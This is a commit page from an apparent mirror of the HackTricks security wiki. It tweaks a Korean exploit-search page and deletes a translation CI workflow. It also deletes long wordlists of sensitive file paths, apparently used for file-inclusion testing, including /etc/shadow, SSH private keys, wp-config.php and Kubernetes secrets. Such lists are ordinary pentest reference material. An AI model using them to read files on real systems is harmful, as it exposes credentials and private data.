mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/generic-hacking/search-exploits.md'] to ko
This commit is contained in:
parent
85cd167567
commit
55db88dc1d
119
.github/workflows/translate_in.yml
vendored
119
.github/workflows/translate_in.yml
vendored
@ -1,119 +0,0 @@
|
|||||||
name: Translator to IN (Hindi)
|
|
||||||
|
|
||||||
on:
|
|
||||||
push:
|
|
||||||
branches:
|
|
||||||
- master
|
|
||||||
paths-ignore:
|
|
||||||
- 'scripts/**'
|
|
||||||
- '.gitignore'
|
|
||||||
- '.github/**'
|
|
||||||
workflow_dispatch:
|
|
||||||
|
|
||||||
concurrency: in
|
|
||||||
|
|
||||||
permissions:
|
|
||||||
id-token: write
|
|
||||||
contents: write
|
|
||||||
|
|
||||||
jobs:
|
|
||||||
run-translation:
|
|
||||||
runs-on: ubuntu-latest
|
|
||||||
environment: prod
|
|
||||||
env:
|
|
||||||
LANGUAGE: Hindi
|
|
||||||
BRANCH: in
|
|
||||||
|
|
||||||
steps:
|
|
||||||
- name: Checkout code
|
|
||||||
uses: actions/checkout@v2
|
|
||||||
with:
|
|
||||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
|
||||||
|
|
||||||
- name: Set up Python
|
|
||||||
uses: actions/setup-python@v2
|
|
||||||
with:
|
|
||||||
python-version: 3.12
|
|
||||||
|
|
||||||
- name: Install python dependencies
|
|
||||||
run: |
|
|
||||||
python -m pip install --upgrade pip
|
|
||||||
pip3 install openai tqdm tiktoken
|
|
||||||
|
|
||||||
# Install Rust and Cargo
|
|
||||||
- name: Install Rust and Cargo
|
|
||||||
uses: actions-rs/toolchain@v1
|
|
||||||
with:
|
|
||||||
toolchain: stable
|
|
||||||
override: true
|
|
||||||
|
|
||||||
# Install mdBook and Plugins
|
|
||||||
- name: Install mdBook and Plugins
|
|
||||||
run: |
|
|
||||||
cargo install mdbook
|
|
||||||
cargo install mdbook-alerts
|
|
||||||
cargo install mdbook-reading-time
|
|
||||||
cargo install mdbook-pagetoc
|
|
||||||
cargo install mdbook-tabs
|
|
||||||
cargo install mdbook-codename
|
|
||||||
|
|
||||||
|
|
||||||
- name: Update & install wget & translator.py
|
|
||||||
run: |
|
|
||||||
sudo apt-get update
|
|
||||||
sudo apt-get install wget -y
|
|
||||||
mkdir scripts
|
|
||||||
cd scripts
|
|
||||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
|
||||||
cd ..
|
|
||||||
|
|
||||||
- name: Download language branch #Make sure we have last version
|
|
||||||
run: |
|
|
||||||
git config --global user.name 'Translator'
|
|
||||||
git config --global user.email 'github-actions@github.com'
|
|
||||||
git checkout "$BRANCH"
|
|
||||||
git pull
|
|
||||||
git checkout master
|
|
||||||
|
|
||||||
- name: Run translation script on changed files
|
|
||||||
run: |
|
|
||||||
echo "Starting translations"
|
|
||||||
echo "Commit: $GITHUB_SHA"
|
|
||||||
|
|
||||||
# Export the OpenAI API key as an environment variable
|
|
||||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
|
||||||
|
|
||||||
# Run the translation script on each changed file
|
|
||||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
|
||||||
if echo "$file" | grep -qE '\.md$'; then
|
|
||||||
echo -n "$file , " >> /tmp/file_paths.txt
|
|
||||||
else
|
|
||||||
echo "Skipping $file"
|
|
||||||
fi
|
|
||||||
done
|
|
||||||
|
|
||||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
|
||||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
|
||||||
|
|
||||||
# Push changes to the repository
|
|
||||||
- name: Commit and push changes
|
|
||||||
run: |
|
|
||||||
git checkout "$BRANCH"
|
|
||||||
git add -A
|
|
||||||
git commit -m "Translated $BRANCH files" || true
|
|
||||||
git push --set-upstream origin "$BRANCH"
|
|
||||||
|
|
||||||
# Build the mdBook
|
|
||||||
- name: Build mdBook
|
|
||||||
run: mdbook build
|
|
||||||
|
|
||||||
# Login in AWs
|
|
||||||
- name: Configure AWS credentials using OIDC
|
|
||||||
uses: aws-actions/configure-aws-credentials@v3
|
|
||||||
with:
|
|
||||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
|
||||||
aws-region: us-east-1
|
|
||||||
|
|
||||||
# Sync the build to S3
|
|
||||||
- name: Sync to S3
|
|
||||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
|
||||||
@ -10,7 +10,7 @@
|
|||||||
|
|
||||||
### Searchsploit
|
### Searchsploit
|
||||||
|
|
||||||
**exploitdb**에서 서비스에 대한 exploit을 검색하는 데 유용합니다.
|
**exploitdb**에서 서비스에 대한 exploit를 검색하는 데 유용합니다.
|
||||||
```bash
|
```bash
|
||||||
#Searchsploit tricks
|
#Searchsploit tricks
|
||||||
searchsploit "linux Kernel" #Example
|
searchsploit "linux Kernel" #Example
|
||||||
@ -42,7 +42,7 @@ vulners 데이터베이스에서도 검색할 수 있습니다: [https://vulners
|
|||||||
|
|
||||||
### Sploitify
|
### Sploitify
|
||||||
|
|
||||||
GTFOBins와 유사한 필터가 있는 익스플로잇의 선별된 목록으로, 취약점 유형(로컬 권한 상승, 원격 코드 실행 등), 서비스 유형(웹, SMB, SSH, RDP 등), 운영 체제 및 실습 랩(익스플로잇을 가지고 놀 수 있는 머신에 대한 링크)으로 필터링됩니다: [https://sploitify.haxx.it](https://sploitify.haxx.it)
|
GTFOBins와 유사한 익스플로잇의 선별된 목록으로, 취약점 유형(로컬 권한 상승, 원격 코드 실행 등), 서비스 유형(웹, SMB, SSH, RDP 등), OS 및 실습 랩(익스플로잇을 가지고 놀 수 있는 머신에 대한 링크)으로 필터링됩니다: [https://sploitify.haxx.it](https://sploitify.haxx.it)
|
||||||
|
|
||||||
### search_vulns
|
### search_vulns
|
||||||
|
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
Binary file not shown.
Binary file not shown.
Binary file not shown.
@ -1,430 +0,0 @@
|
|||||||
/apache/logs/access.log
|
|
||||||
/apache/logs/access_log
|
|
||||||
/apache/logs/error.log
|
|
||||||
/apache/logs/error_log
|
|
||||||
~/.atfp_history
|
|
||||||
~/.bash_history
|
|
||||||
~/.bash_logout
|
|
||||||
~/.bash_profile
|
|
||||||
~/.bashrc
|
|
||||||
/bin/php.ini
|
|
||||||
/defaultVolumes/webBackup/opt/apache2/conf/httpd.conf
|
|
||||||
/etc/anaconda-ks.cfg
|
|
||||||
/etc/anacrontab
|
|
||||||
/etc/apache2/apache2.conf
|
|
||||||
/etc/apache2/conf/httpd.conf
|
|
||||||
/etc/apache/conf/httpd.conf
|
|
||||||
/etc/at.allow
|
|
||||||
/etc/at.deny
|
|
||||||
/etc/bashrc
|
|
||||||
/etc/bootptab
|
|
||||||
/etc/centos-release
|
|
||||||
/etc/cesi.conf
|
|
||||||
/etc/chrootUsers
|
|
||||||
/etc/chrootUsersvar/log/xferlog
|
|
||||||
/etc/chttp.conf
|
|
||||||
/etc/cron.allow
|
|
||||||
/etc/cron.deny
|
|
||||||
/etc/crontab
|
|
||||||
/etc/cups/cupsd.conf
|
|
||||||
/etc/debconf.conf
|
|
||||||
/etc/debian_version
|
|
||||||
/etc/dovecot/dovecot.passwd
|
|
||||||
/etc/environment
|
|
||||||
/etc/fstab
|
|
||||||
/etc/ftpaccess
|
|
||||||
/etc/groups
|
|
||||||
/etc/grub.conf
|
|
||||||
/etc/gshadow
|
|
||||||
/etc/hostapd.conf
|
|
||||||
/etc/hostname
|
|
||||||
/etc/hosts.allow
|
|
||||||
/etc/hosts.deny
|
|
||||||
/etc/http/conf/httpd.conf
|
|
||||||
/etc/httpd/access.conf
|
|
||||||
/etc/httpd.conf
|
|
||||||
/etc/httpd/srm.conf
|
|
||||||
/etc/http/httpd.conf
|
|
||||||
/etc/inetd.conf
|
|
||||||
/etc/inittab
|
|
||||||
/etc/lighttpd.conf
|
|
||||||
/etc/lilo.conf
|
|
||||||
/etc/logrotate.d/proftpd
|
|
||||||
/etc/logrotate.d/proftpdwww/logs/proftpd.system.log
|
|
||||||
/etc/lsb-release
|
|
||||||
/etc/master.passwd
|
|
||||||
/etc/modules.conf
|
|
||||||
/etc/motdetc/passwd
|
|
||||||
/etc/mtab
|
|
||||||
/etc/my.conf
|
|
||||||
/etc/mysql/user.MYD
|
|
||||||
/etc/netconfig
|
|
||||||
/etc/network/interfaces
|
|
||||||
/etc/networks
|
|
||||||
/etc/npasswd
|
|
||||||
/etc/ntp.conf
|
|
||||||
/etc/os-release
|
|
||||||
/etc/php4.4/fcgi/php.ini
|
|
||||||
/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini
|
|
||||||
/etc/php4/apache/php.ini
|
|
||||||
/etc/php5/cgi/php.ini
|
|
||||||
/etc/php/apache/php.ini
|
|
||||||
/etc/php/cgi/php.ini
|
|
||||||
/etc/php.ini
|
|
||||||
/etc/php/php4/php.ini
|
|
||||||
/etc/php/php4/php.inietc/php/apache/php.ini
|
|
||||||
/etc/polkit-1/localauthority.conf.d/50-localauthority.conf
|
|
||||||
/etc/polkit-1/localauthority.conf.d/51-debian-sudo.conf
|
|
||||||
/etc/printcap
|
|
||||||
/etc/proftpd/modules.confvar/log/vsftpd.log
|
|
||||||
/etc/proftpd/proftpd.conf
|
|
||||||
/etc/protocols
|
|
||||||
/etc/protpd/proftpd.conf
|
|
||||||
/etc/pureftpd.passwd
|
|
||||||
/etc/pureftpd.pdb
|
|
||||||
/etc/pureftpd.pdbetc/pureftpd.passwd
|
|
||||||
/etc/pure-ftpd/pureftpd.pdb
|
|
||||||
/etc/pure-ftpd/putreftpd.pdb
|
|
||||||
/etc/rsyncd.conf
|
|
||||||
/etc/rsyslog.conf
|
|
||||||
/etc/redhat-release
|
|
||||||
/etc/samba/smb.conf
|
|
||||||
/etc/security/environetc/security/limits
|
|
||||||
/etc/security/group
|
|
||||||
/etc/security/passwd
|
|
||||||
/etc/security/user
|
|
||||||
/etc/services
|
|
||||||
/etc/shells
|
|
||||||
/etc/snmpd.conf
|
|
||||||
/etc/ssh/ssh_host_ecdsa_key
|
|
||||||
/etc/ssh/ssh_host_ecdsa_key.pub
|
|
||||||
/etc/ssh/ssh_host_key
|
|
||||||
/etc/ssh/ssh_host_key.pub
|
|
||||||
/etc/ssh/ssh_host_rsa_key
|
|
||||||
/etc/ssh/ssh_host_rsa_key.pub
|
|
||||||
/etc/sudoers
|
|
||||||
/etc/supervisord.conf
|
|
||||||
/etc/sysconfig/network
|
|
||||||
/etc/sysctl.conf
|
|
||||||
/etc/syslog.conf
|
|
||||||
/etc/system-release
|
|
||||||
/etc/termcap
|
|
||||||
/etc/timezone
|
|
||||||
/etc/tomcat/tomcat-users.xml
|
|
||||||
/etc/updatedb.conf
|
|
||||||
~/.gtkrc
|
|
||||||
/local/apache2/conf/httpd.conf
|
|
||||||
/log/apache2/error_log
|
|
||||||
~/.login
|
|
||||||
~/.logout
|
|
||||||
/logs/access.log
|
|
||||||
/logs/access_log
|
|
||||||
/logs/error.log
|
|
||||||
/logs/error_log
|
|
||||||
/logs/security_debug_log
|
|
||||||
/logs/security_log
|
|
||||||
~/.mysql_history
|
|
||||||
~/.nano_history
|
|
||||||
/opt/apache2/conf/httpd.conf
|
|
||||||
/opt/apache/conf/httpd.conf
|
|
||||||
/opt/lampp/etc/httpd.conf
|
|
||||||
/opt/lampp/logs/access.log
|
|
||||||
/opt/lampp/logs/access_log
|
|
||||||
/opt/lampp/logs/error_log
|
|
||||||
/opt/lampp/logs/error.logopt
|
|
||||||
/opt/xampp/logs/access.log
|
|
||||||
/opt/xampp/logs/error.log
|
|
||||||
/opt/xampp/logs/error_log
|
|
||||||
/php4php.ini
|
|
||||||
/php5php.ini
|
|
||||||
~/.php_history
|
|
||||||
/phpphp.ini
|
|
||||||
/PHPphp.ini
|
|
||||||
/private/etc/httpd/httpd.conf
|
|
||||||
/private/etc/httpd/httpd.conf.
|
|
||||||
/proc/cpuinfo
|
|
||||||
/proc/filesystems
|
|
||||||
/proc/interrupts
|
|
||||||
/proc/ioports
|
|
||||||
/proc/meminfo
|
|
||||||
/proc/modules
|
|
||||||
/proc/self/cmdline
|
|
||||||
/proc/self/cwd/index.php
|
|
||||||
/proc/self/fd/0
|
|
||||||
/proc/self/fd/1
|
|
||||||
/proc/self/fd/10
|
|
||||||
/proc/self/fd/100
|
|
||||||
/proc/self/fd/11
|
|
||||||
/proc/self/fd/12
|
|
||||||
/proc/self/fd/13
|
|
||||||
/proc/self/fd/14
|
|
||||||
/proc/self/fd/15
|
|
||||||
/proc/self/fd/16
|
|
||||||
/proc/self/fd/17
|
|
||||||
/proc/self/fd/18
|
|
||||||
/proc/self/fd/19
|
|
||||||
/proc/self/fd/2
|
|
||||||
/proc/self/fd/20
|
|
||||||
/proc/self/fd/21
|
|
||||||
/proc/self/fd/22
|
|
||||||
/proc/self/fd/23
|
|
||||||
/proc/self/fd/24
|
|
||||||
/proc/self/fd/25
|
|
||||||
/proc/self/fd/26
|
|
||||||
/proc/self/fd/27
|
|
||||||
/proc/self/fd/28
|
|
||||||
/proc/self/fd/29
|
|
||||||
/proc/self/fd/3
|
|
||||||
/proc/self/fd/30
|
|
||||||
/proc/self/fd/31
|
|
||||||
/proc/self/fd/32
|
|
||||||
/proc/self/fd/33
|
|
||||||
/proc/self/fd/34
|
|
||||||
/proc/self/fd/35
|
|
||||||
/proc/self/fd/36
|
|
||||||
/proc/self/fd/37
|
|
||||||
/proc/self/fd/38
|
|
||||||
/proc/self/fd/39
|
|
||||||
/proc/self/fd/4
|
|
||||||
/proc/self/fd/41
|
|
||||||
/proc/self/fd/42
|
|
||||||
/proc/self/fd/43
|
|
||||||
/proc/self/fd/44
|
|
||||||
/proc/self/fd/45
|
|
||||||
/proc/self/fd/46
|
|
||||||
/proc/self/fd/47
|
|
||||||
/proc/self/fd/48
|
|
||||||
/proc/self/fd/49
|
|
||||||
/proc/self/fd/5
|
|
||||||
/proc/self/fd/51
|
|
||||||
/proc/self/fd/52
|
|
||||||
/proc/self/fd/53
|
|
||||||
/proc/self/fd/54
|
|
||||||
/proc/self/fd/55
|
|
||||||
/proc/self/fd/56
|
|
||||||
/proc/self/fd/57
|
|
||||||
/proc/self/fd/58
|
|
||||||
/proc/self/fd/59
|
|
||||||
/proc/self/fd/6
|
|
||||||
/proc/self/fd/61
|
|
||||||
/proc/self/fd/62
|
|
||||||
/proc/self/fd/63
|
|
||||||
/proc/self/fd/64
|
|
||||||
/proc/self/fd/65
|
|
||||||
/proc/self/fd/66
|
|
||||||
/proc/self/fd/67
|
|
||||||
/proc/self/fd/68
|
|
||||||
/proc/self/fd/69
|
|
||||||
/proc/self/fd/7
|
|
||||||
/proc/self/fd/71
|
|
||||||
/proc/self/fd/72
|
|
||||||
/proc/self/fd/73
|
|
||||||
/proc/self/fd/74
|
|
||||||
/proc/self/fd/75
|
|
||||||
/proc/self/fd/76
|
|
||||||
/proc/self/fd/77
|
|
||||||
/proc/self/fd/78
|
|
||||||
/proc/self/fd/79
|
|
||||||
/proc/self/fd/8
|
|
||||||
/proc/self/fd/81
|
|
||||||
/proc/self/fd/82
|
|
||||||
/proc/self/fd/83
|
|
||||||
/proc/self/fd/84
|
|
||||||
/proc/self/fd/85
|
|
||||||
/proc/self/fd/86
|
|
||||||
/proc/self/fd/87
|
|
||||||
/proc/self/fd/88
|
|
||||||
/proc/self/fd/89
|
|
||||||
/proc/self/fd/9
|
|
||||||
/proc/self/fd/91
|
|
||||||
/proc/self/fd/92
|
|
||||||
/proc/self/fd/93
|
|
||||||
/proc/self/fd/94
|
|
||||||
/proc/self/fd/95
|
|
||||||
/proc/self/fd/96
|
|
||||||
/proc/self/fd/97
|
|
||||||
/proc/self/fd/98
|
|
||||||
/proc/self/fd/99
|
|
||||||
/proc/self/net/arp
|
|
||||||
/proc/self/stat
|
|
||||||
/proc/self/status
|
|
||||||
/proc/self/statvar
|
|
||||||
/proc/stat
|
|
||||||
/proc/swaps
|
|
||||||
~/.profile
|
|
||||||
/root/anaconda-ks.cfg
|
|
||||||
/root/.bash_history
|
|
||||||
/root/.ssh/authorized_hosts
|
|
||||||
/root/.ssh/authorized_keys
|
|
||||||
/root/.ssh/id_dsa
|
|
||||||
/root/.ssh/id_rsa
|
|
||||||
/root/.ssh/known_hosts
|
|
||||||
~/.ssh/authorized_keys
|
|
||||||
~/.ssh/id_dsa
|
|
||||||
~/.ssh/id_dsa.pub
|
|
||||||
~/.ssh/identity
|
|
||||||
~/.ssh/identity.pub
|
|
||||||
~/.ssh/id_rsa
|
|
||||||
~/.ssh/id_rsa.pub
|
|
||||||
/usr/apache2/conf/httpd.conf
|
|
||||||
/usr/apache/conf/httpd.conf
|
|
||||||
/usr/etc/pure-ftpd.conf
|
|
||||||
/usr/lib/security/mkuser.default
|
|
||||||
/usr/local/apache2/conf/httpd.conf
|
|
||||||
/usr/local/apache2/log/error_log
|
|
||||||
/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log
|
|
||||||
/usr/local/apache2/logs/error_log
|
|
||||||
/usr/local/apache2/logs/error.logvar/log/access_log
|
|
||||||
/usr/local/apache/audit_log
|
|
||||||
/usr/local/apache/conf/modsec.conf
|
|
||||||
/usr/local/apache/error.log
|
|
||||||
/usr/local/apache/error_log
|
|
||||||
/usr/local/apache/httpd.confusr/local/apache2/httpd.conf
|
|
||||||
/usr/local/apache/log
|
|
||||||
/usr/local/apache/log/error_log
|
|
||||||
/usr/local/apache/logs
|
|
||||||
/usr/local/apache/logs/access.log
|
|
||||||
/usr/local/apache/logs/access.logusr/local/apache/logs/error_log
|
|
||||||
/usr/local/apache/logs/error.log
|
|
||||||
/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf
|
|
||||||
/usr/local/cpanel/logs/access_log
|
|
||||||
/usr/local/cpanel/logs/login_log
|
|
||||||
/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log
|
|
||||||
/usr/local/cpanel/logs/stats_log
|
|
||||||
/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log
|
|
||||||
/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf
|
|
||||||
/usr/local/etc/apache/conf/httpd.conf
|
|
||||||
/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf
|
|
||||||
/usr/local/etc/apache/vhosts.confetc/php.ini
|
|
||||||
/usr/local/etc/httpd/logs/access_log
|
|
||||||
/usr/local/etc/httpd/logs/error_log
|
|
||||||
/usr/local/httpd/conf/httpd.conf
|
|
||||||
/usr/local/lib/php.ini
|
|
||||||
/usr/local/lib/php.iniusr/local/php/lib/php.ini
|
|
||||||
/usr/local/php5/httpd.conf.php
|
|
||||||
/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf
|
|
||||||
/usr/local/php/httpd.conf
|
|
||||||
/usr/local/php/httpd.conf.ini
|
|
||||||
/usr/local/php/httpd.conf.php
|
|
||||||
/usr/local/php/lib/php.ini
|
|
||||||
/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl
|
|
||||||
/usr/local/pureftpd/etc/pureftpd.pdn
|
|
||||||
/usr/local/pureftpd/sbin/pure-config.pl
|
|
||||||
/usr/local/www/logs/httpd_log
|
|
||||||
/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/
|
|
||||||
/usr/ports/ftp/pure-ftpd/
|
|
||||||
/usr/ports/net/pure-ftpd/
|
|
||||||
/usr/sbin/pure-config.pl
|
|
||||||
/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf
|
|
||||||
/usr/var/lib/mysql/debian.cnf
|
|
||||||
/usr/var/lib/mysql/my.cnf
|
|
||||||
/usr/var/lib/mysql/user.MYD
|
|
||||||
/var/apache2/config.inc
|
|
||||||
/var/apache/logs/access_log
|
|
||||||
/var/apache/logs/error_log
|
|
||||||
/var/htmp
|
|
||||||
/var/lib/mysql/debian.cnf
|
|
||||||
/var/lib/mysql/mysql/user.MYD
|
|
||||||
/var/lib/mysql/user.MYD
|
|
||||||
/var/local/www/conf/php.ini
|
|
||||||
/var/local/www/conf/php.inietc/php/cgi/php.ini
|
|
||||||
/var/log/access.log
|
|
||||||
/var/log/apache2/access_log
|
|
||||||
/var/log/apache2/access_logvar/log/httpd/error_log
|
|
||||||
/var/log/apache2/error.log
|
|
||||||
/var/log/apache2/error_log
|
|
||||||
/var/log/apache/access_log
|
|
||||||
/var/log/apache/error_log
|
|
||||||
/var/log/apache-ssl/access.log
|
|
||||||
/var/log/apache-ssl/error.log
|
|
||||||
/var/log/auth.log
|
|
||||||
/var/log/boot
|
|
||||||
/var/log/chttp.log
|
|
||||||
/var/log/cron.logvar/log/couchdb/couch.log
|
|
||||||
/var/log/cups/error.log
|
|
||||||
/var/log/daemon.log
|
|
||||||
/var/log/debug
|
|
||||||
/var/log/dmesg
|
|
||||||
/var/log/dmessage
|
|
||||||
/var/log/dpkg.log
|
|
||||||
/var/log/error_log
|
|
||||||
/var/log/error.logvar/log/apache/access_log
|
|
||||||
/var/log/exim4/mainlog
|
|
||||||
/var/log/exim4_mainlog
|
|
||||||
/var/log/exim4/paniclog
|
|
||||||
/var/log/exim/mainlog
|
|
||||||
/var/log/exim/mainlogvar/log/maillog
|
|
||||||
/var/log/exim.paniclog
|
|
||||||
/var/log/exim/paniclog
|
|
||||||
/var/log/faillog
|
|
||||||
/var/log/ftp-proxy
|
|
||||||
/var/log/ftp-proxy/ftp-proxy.log
|
|
||||||
/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy
|
|
||||||
/var/log/httpsd/ssl.access_log
|
|
||||||
/var/log/httpsd/ssl_log
|
|
||||||
/var/log/kern.log
|
|
||||||
/var/log/lastlog
|
|
||||||
/var/log/lighttpd/access.log
|
|
||||||
/var/log/lighttpd/error.log
|
|
||||||
/var/log/lighttpd/lighttpd.access.log
|
|
||||||
/var/log/lighttpd/lighttpd.error.log
|
|
||||||
/var/log/mail.info
|
|
||||||
/var/log/maillog
|
|
||||||
/var/log/mail.warn
|
|
||||||
/var/log/message
|
|
||||||
/var/log/mysqlderror.log
|
|
||||||
/var/log/mysqlderror.logvar/log/mysql/mysql.log
|
|
||||||
/var/log/mysql/mysql.log
|
|
||||||
/var/log/news
|
|
||||||
/var/log/nginx/access.log
|
|
||||||
/var/log/nginx/access.logproc/self/cmdline
|
|
||||||
/var/log/nginx/error.log
|
|
||||||
/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log
|
|
||||||
/var/log/postgresql/postgresql-9.6-mail.log
|
|
||||||
/var/log/qmail
|
|
||||||
/var/log/redis/redis-server.log
|
|
||||||
/var/log/samba/log.smbd
|
|
||||||
/var/log/secure
|
|
||||||
/var/log/smtpd
|
|
||||||
/var/log/spooler
|
|
||||||
/var/log/sshd.log
|
|
||||||
/var/log/syslog
|
|
||||||
/var/log/telnetd
|
|
||||||
/var/log/wtmp
|
|
||||||
/var/log/xferlog
|
|
||||||
/var/log/yum.log
|
|
||||||
/var/mail/root
|
|
||||||
/var/run/secrets/kubernetes.io/serviceaccount
|
|
||||||
/var/run/utmp
|
|
||||||
/var/webmin/miniserv.log
|
|
||||||
/var/www/conf/httpd.conf
|
|
||||||
/var/www/html/wordpress/wp-config.php
|
|
||||||
/var/www/html/wp/wp-config.php
|
|
||||||
/var/www/log/access_log
|
|
||||||
/var/www/log/error_log
|
|
||||||
/var/www/logs/access.log
|
|
||||||
/var/www/logs/access_log
|
|
||||||
/var/www/logs/access_logvar/www/logs/access.log
|
|
||||||
/var/www/mgr/logs/access.log
|
|
||||||
/var/www/mgr/logs/error_log
|
|
||||||
/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log
|
|
||||||
/var/www/wordpress/wp-config.php
|
|
||||||
/var/www/wp/wp-config.php
|
|
||||||
~/.viminfo
|
|
||||||
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
|
|
||||||
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf
|
|
||||||
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
|
|
||||||
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
|
|
||||||
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
|
|
||||||
/Volumes/webBackup/private/etc/httpd/httpd.conf
|
|
||||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf
|
|
||||||
/web/conf/php.ini
|
|
||||||
/WINDOWSphp.ini
|
|
||||||
/WINNTphp.ini
|
|
||||||
~/.wm_style
|
|
||||||
/xamppapachebinphp.ini
|
|
||||||
/xampp/logs/access_log
|
|
||||||
~/.Xdefaults
|
|
||||||
~/.xinitrc
|
|
||||||
~/.Xresources
|
|
||||||
~/.xsession
|
|
||||||
@ -1 +0,0 @@
|
|||||||
423
|
|
||||||
@ -1,249 +0,0 @@
|
|||||||
/apache/logs/access.log
|
|
||||||
/apache/logs/error.log
|
|
||||||
/apachephpphp.ini
|
|
||||||
/bin/php.ini
|
|
||||||
/ect/hostname
|
|
||||||
/etc/apache2/conf/httpd.conf
|
|
||||||
/etc/apache2/httpd.conf
|
|
||||||
/etc/apache/conf/httpd.conf
|
|
||||||
/etc/chrootUsersvar/log/xferlog
|
|
||||||
/etc/crontab
|
|
||||||
/etc/dovecot/dovecot.passwd
|
|
||||||
/etc/fstab
|
|
||||||
/etc/ftpchroot
|
|
||||||
/etc/ftphosts
|
|
||||||
/etc/group
|
|
||||||
/etc/hosts
|
|
||||||
/etc/httpd.conf
|
|
||||||
/etc/httpd/conf/httpd.conf
|
|
||||||
/etc/httpd/conf/httpd.confetc/http/conf/httpd.conf
|
|
||||||
/etc/httpd/httpd.conf
|
|
||||||
/etc/httpd/logs/access.log
|
|
||||||
/etc/httpd/logs/access_logetc/httpd/logs/error_log
|
|
||||||
/etc/httpd/logs/access.logProgramFilesApacheGroupApachelogsaccess.log
|
|
||||||
/etc/httpd/logs/error.log
|
|
||||||
/etc/httpd/php.ini
|
|
||||||
/etc/http/httpd.conf
|
|
||||||
/etc/issue
|
|
||||||
/etc/logrotate.d/ftp
|
|
||||||
/etc/logrotate.d/proftpdwww/logs/proftpd.system.log
|
|
||||||
/etc/logrotate.d/vsftpd.log
|
|
||||||
/etc/motd
|
|
||||||
/etc/motdetc/passwd
|
|
||||||
/etc/my.cnf
|
|
||||||
/etc/mysql/my.cnf
|
|
||||||
/etc/netconfig
|
|
||||||
/etc/passwd
|
|
||||||
/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini
|
|
||||||
/etc/php4/apache2/php.ini
|
|
||||||
/etc/php4/cgi/php.ini
|
|
||||||
/etc/php5/apache2/php.ini
|
|
||||||
/etc/php5/apache/php.ini
|
|
||||||
/etc/php5/cgi/php.ini
|
|
||||||
/etc/php/apache2/php.ini
|
|
||||||
/etc/php/php4/php.inietc/php/apache/php.ini
|
|
||||||
/etc/php/php.ini
|
|
||||||
/etc/profile
|
|
||||||
/etc/proftp.conf
|
|
||||||
/etc/proftpd/modules.confvar/log/vsftpd.log
|
|
||||||
/etc/protpd/proftpd.conf
|
|
||||||
/etc/pure-ftpd.conf
|
|
||||||
/etc/pureftpd.pdbetc/pureftpd.passwd
|
|
||||||
/etc/pure-ftpd/pure-ftpd.conf
|
|
||||||
/etc/pure-ftpd/pure-ftpd.pdb
|
|
||||||
/etc/pure-ftpd/pureftpd.pdb
|
|
||||||
/etc/security/environetc/security/limits
|
|
||||||
/etc/security/group
|
|
||||||
/etc/security/passwd
|
|
||||||
/etc/security/user
|
|
||||||
/etc/shadow
|
|
||||||
/etc/sudoers
|
|
||||||
/etc/vhcs2/proftpd/proftpd.conf
|
|
||||||
/etc/vsftpd.chroot_list
|
|
||||||
/etc/vsftpd.conf
|
|
||||||
/etc/vsftpd/vsftpd.conf
|
|
||||||
/etc/wu-ftpd/ftpaccess
|
|
||||||
/etc/wu-ftpd/ftphosts
|
|
||||||
/etc/wu-ftpd/ftpusers
|
|
||||||
/home2binstableapachephp.inihomebinstableapachephp.ini
|
|
||||||
/logs/access_log
|
|
||||||
/logs/access.loglogs/error_log
|
|
||||||
/logs/error.log
|
|
||||||
/logs/pure-ftpd.log
|
|
||||||
/NetServerbinstableapachephp.ini
|
|
||||||
/opt/apache/conf/httpd.confopt/apache2/conf/httpd.conf
|
|
||||||
/opt/lampp/logs/access_logopt/lampp/logs/access.log
|
|
||||||
/opt/lampp/logs/error_log
|
|
||||||
/opt/lampp/logs/error.logopt/xampp/logs/access_log
|
|
||||||
/opt/xampp/etc/php.ini
|
|
||||||
/opt/xampp/logs/access.log
|
|
||||||
/opt/xampp/logs/error.log
|
|
||||||
/opt/xampp/logs/error_log
|
|
||||||
/php4php.ini
|
|
||||||
/php5php.ini
|
|
||||||
/phpphp.ini
|
|
||||||
/PHPphp.ini
|
